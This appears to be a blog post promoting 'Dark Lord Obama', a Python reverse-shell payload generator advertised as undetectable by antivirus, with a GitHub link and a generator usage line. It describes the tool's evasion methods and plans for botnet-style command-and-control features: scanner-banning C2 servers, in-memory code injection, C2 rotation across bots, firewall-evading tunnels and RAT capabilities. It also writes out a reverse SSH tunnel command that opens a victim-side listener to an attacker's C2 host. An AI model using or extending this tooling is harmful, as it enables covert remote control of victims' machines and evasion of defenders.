Introducing Dark Lord Obama: Undetectable (as of 7/29/2019) Pythonic Payload Generator

obama-sith-lord

Introducing Dark Lord Obama, undetectable on VirusTotal as of July 29th, 2019. I was so emboldened that I actually went ahead and submitted the entire file knowing that upon suspicion and/or detection the news would have passed through all the antivirus vendors, including Microsoft Windows Defender. In other words, if I failed, the fires on the watchtowers would have all been lit.

https://github.com/tanc7/dark-lord-obama

a_undetectable_payload1

DLO generates a Pythonic reverse shell that as of July 29th, 2019, is undetectable on VirusTotal.

It combines multiple won’t-to-be-disclosed techniques (undiscloseable in detail) including but not limited to:

1. “Command Segmentation”
2. “AES Encryption” with a 32-bit key and a 16-bit initialization vector
3. Base64 Encoding – It was a necessity
4. Inline Python exec() functions, C asm() functions (will be added soon), Java/Jython, Cython, Ctypes

a_undetectable_payload2

Here is proof with my SHA256Sums.

a_undetectable_payload5

# Current usage

Currently it only works on targets that run Python. A cross-compilable and transpilable edition is in the works after DEFCON and after I pass the OSCP.

`python darklordobama-generator.py <LHOST> <LPORT>`

# Incoming features

1. Cross-compilation – Ideal targeted platforms, Android, iOS, MacOS (already possible with py2app), Windows (requires transpiling it back to a lower level language like C, C#, Visual C++), ARM/MIPS based routers and IoT devices
2. C2 Server – Encrypts a whole TLS 1.3 certificate within the payload, and attempts to negotiate a TLS session with the Command-and-Control Server (the payload does not have the key or IV, the server sends a CHALLENGE string containing it for the payload to decrypt the TLS cert), if a IP or host fails to provide the correct TLS certificate (handshake), the C2 Server immediately issues a permaban rule on IPTables (DROP packets), designed to thwart Shodan’s malware hunter https://malware-hunter.shodan.io/
3. “Steroid Injections” – Re-writable sections of memory occupied by the payload using statically defined functions, built in reverse-SSH tunnels, and SocketServer. Instantly grant your payload new abilities without having to re-touch the disk (it modifies a function that is holding a 5,000 byte buffer of \x90 NOP instructions and then lets you CALL it). This is NOT a buffer overflow, rather, it’s pre-allocated rewritable functions that can be called after raw binary data is downloaded via the self-contained SocketServer module.
4. Dynamic DNS Support – With built-in dns resolver to ensure that you always use public DNS (1.1.1.1 or 8.8.8.8) to evade corporate DNS whitelisting
5. C2_Rotate Function – Using Ansible, Tensorflow, and Python, automate the spinning up of brand new Command-and-Control Servers, and immediately push a mass-update on all current bots to “rotate” to the new VPS. Requires Dynamic DNS subscription.
6. Built-in SSH client – Allow your payloads to create reverse SSH tunnels to tunnel out of restrictive firewalls (like a home NATed router)
7. ASM Interpreter – Run x86 Assembly Instructions or launch object .o files, and allows attackers to manually run their own shellcode they generated with msfvenom, right through the session

8. Pluggable Transport Support – Using Golang’s offerings of GQUIC, Scramblesuit, Obfs4

9. VPN Support – Wireguard, OpenVPN, IPSEC-IKEv2

10. Built-in Tunneling Modules – Support for Iodine, Dnscat2, HTTPTunnel, Ncat, TorTunnel

11. Tor/I2P Navigation – Normally reverse shells cannot navigate the .onion network if it is only configured for IPv4/IPv6 standards. A shell would land, the payload would run, but it’ll never connect back (tested on TAILS)

a_undetectable_payload1

Currently the shell is a proof-of-concept that I successfully evaded all common static binary analysis techniques.

Steroid-Injector Module Explained (Upcoming Update)

This module is relatively simple, it’s simple calling Python’s exec function or C’s inline assembly instructions after receiving raw platform code from the Command-and-Control Server. That SocketServer-based connection is actually a second listener port that has been opened on the victim.

Now normally, you wouldn’t be able to reach a machine with that SocketServer listening that is sitting behind a router/NAT and public IP. But if you have remote access with the reverse shell, you can simply perform a reverse SSH tunnel back to bind it locally on your C2 server with the command

ssh -Nf root@attackerc2 -R 8443:127.0.0.1:9999.

This means that the victim’s SocketServer is now reachable by simply logging into your C2 and then using our future injector.py module to connect to root@localhost:9999, sending your desired instructions, let DLO ingest it and then you can call it on a interactive menu, like a function.

The design is in the drafts, but I plan to have the SocketServer and incoming TCP connections work in this format, CMD-Header (inject, delete, call) – INCOMING INSTRUCTIONS (LENGTH) – <Python, C, or ASM instructions>. My initial draft involves having overwritable buffers within callable functions that measure 5,000 bytes long, 10 of them. And that with a certain header, you can bridge multiple functions to call them together, for particularly big applications that you are trying to push into your bots.

I have yet to convert it into a full-blown Remote Access Trojan (Meterpreter, Pupy, Beacon, Empire agent etc.), however once I get the Steroid-Injector module written, you can give the shell RAT-like capabilities, since you can remotely upload Python, C, or Assembly instructions and make it do anything you want. That’s my priority update.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s